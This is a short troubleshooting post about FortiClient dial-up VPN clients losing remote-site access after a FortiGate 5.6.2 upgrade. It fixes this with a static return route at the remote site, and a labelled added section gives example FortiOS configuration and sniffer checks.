FortiClient can’t connect over dial-up VPN to remote site
Posted on November 29th, 2017 by Bert Zefat
After upgrading from 5.2.x or 5.4.x to 5.6.2 it is possible that FortiClient VPN-connected clients cannot access a remote site over VPN anymore from the FortiGate that they are connecting to.
The local LAN is accessible, but the remote LAN is not.
It seems there is a routing issue in the 5.6.2 OS. If you run
# execute traceroute <ip-address>
you will see that the first hop is an IP address that is not defined on the dial-up FortiGate.
You must add a static route at the remote site for the IP range of the IPsec client IP addresses (the dial-up address pool), pointing back into the tunnel towards the dial-up FortiGate.
With
# diagnose sniffer packet <interface> 'host <ip address>'
you must see a ping request and reply on both the source FortiGate and the remote FortiGate.
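As an added example (not part of the original post), this is what the fix and the verification described above look like on the FortiGate CLI. The address pool 10.212.134.0/24 and the tunnel interface name "to_dialup_fgt" are assumed values; replace them with your own FortiClient pool and the name of the IPsec interface towards the dial-up FortiGate.

```fortios
# Added example (not from the original post): static route on the REMOTE-site
# FortiGate so return traffic for the FortiClient dial-up address pool goes back
# into the site-to-site tunnel. Assumed (constructed) values:
#   10.212.134.0/24  - IP pool handed out to FortiClient dial-up users
#   "to_dialup_fgt"  - IPsec tunnel interface towards the dial-up FortiGate
config router static
    edit 0
        set dst 10.212.134.0 255.255.255.0
        set device "to_dialup_fgt"
        set comment "Return route for FortiClient dial-up pool"
    next
end

# Verify on the remote FortiGate that a dial-up client address now resolves
# to the tunnel interface instead of a default or unrelated next hop
get router info routing-table details 10.212.134.200

# Then, while a dial-up client pings a host on the remote LAN, confirm that both
# the request and the reply are seen on each FortiGate (run on both sides;
# verbosity level 4 also prints the ingress/egress interface names)
diagnose sniffer packet any 'host 10.212.134.200 and icmp' 4
```

If the sniffer on the remote FortiGate shows the request arriving but the reply leaving on the wrong interface, the static route is missing or has a less specific prefix than a competing route.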